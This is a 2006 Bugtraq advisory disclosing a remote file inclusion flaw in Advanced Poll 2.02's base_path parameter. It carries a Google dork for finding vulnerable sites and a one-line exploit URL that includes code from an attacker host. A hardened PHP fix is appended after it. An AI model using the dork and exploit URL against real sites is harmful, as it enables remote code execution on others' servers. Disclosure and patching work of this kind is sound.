Message-ID: <20060721083625.24871.qmail@securityfocus.com>
Date: 21 Jul 2006 08:36:25 -0000
From: chris_hasibuan@...oo.com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path)
 Remote File Inclusion

#############################SolpotCrew Community################################ 
# 
# Advanced Poll ver 2.02 (base_path) Remote File Inclusion 
# 
# Vendor site : http://www.proxy2.de/scripts.php 
# 
################################################################################# 
# 
# 
# Bug Found By :Solpot a.k.a (k. Hasibuan) 
# 
# contact: chris_hasibuan@...oo.com 
# 
# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt
# 
################################################################################ 
# 
# 
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , 
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile
# and all crew #mardongan @ irc.dal.net 
# 
# 
############################################################################### 
Input passed to the "base_path" parameter is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 

Code from /admin/common.inc.php:

$pollvars['SELF'] = basename($PHP_SELF); 
// $base_path reaches include() without any validation
if (file_exists("$base_path/lang/$pollvars[lang]")) { 
    include ("$base_path/lang/$pollvars[lang]"); 
} else { 
    include ("$base_path/lang/english.php"); 
}

google dork : inurl:comments.php?action= send id 

EXPLOIT : 

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker 

##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F##################################
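
A hardened form of the language include quoted in the advisory above, as an added example that is not part of the original post or the vendor's code. The constant POLL_ENTRY, the function poll_lang_file() and the assumption that lang/ sits one level above admin/ are hypothetical.

```php
<?php
// Added example, not Advanced Poll's code: a hardened replacement for the
// language include quoted from /admin/common.inc.php.

// Refuse direct requests to the include file. POLL_ENTRY is a hypothetical
// constant that the application's real entry scripts would define.
if (!defined('POLL_ENTRY')) {
    http_response_code(403);
    exit;
}

/**
 * Resolve the language file to include. The directory never comes from
 * request input, and only file names present in lang/ are accepted.
 */
function poll_lang_file(string $baseDir, ?string $requested): string
{
    $langDir = realpath($baseDir . '/lang');
    if ($langDir === false) {
        throw new RuntimeException('language directory missing');
    }
    // Allowlist built from what is actually on disk.
    $allowed = array_map('basename', glob($langDir . '/*.php') ?: []);
    $name = basename((string) $requested);
    if (!in_array($name, $allowed, true)) {
        $name = 'english.php';
    }
    $path = realpath($langDir . '/' . $name);
    // Final containment check: the resolved path must stay inside lang/.
    if ($path === false || strpos($path, $langDir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file outside lang/');
    }
    return $path;
}

// The base directory is derived from this file's own location (assumed
// layout: admin/ and lang/ share a parent), not from a variable that a
// request could populate.
$base_path = dirname(__DIR__);
$pollvars['SELF'] = basename($_SERVER['SCRIPT_NAME']);
include poll_lang_file($base_path, $pollvars['lang'] ?? null);
```

Setting allow_url_include = Off in php.ini (PHP 5.2 and later) additionally stops include() from fetching remote URLs even if a path check is missed.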
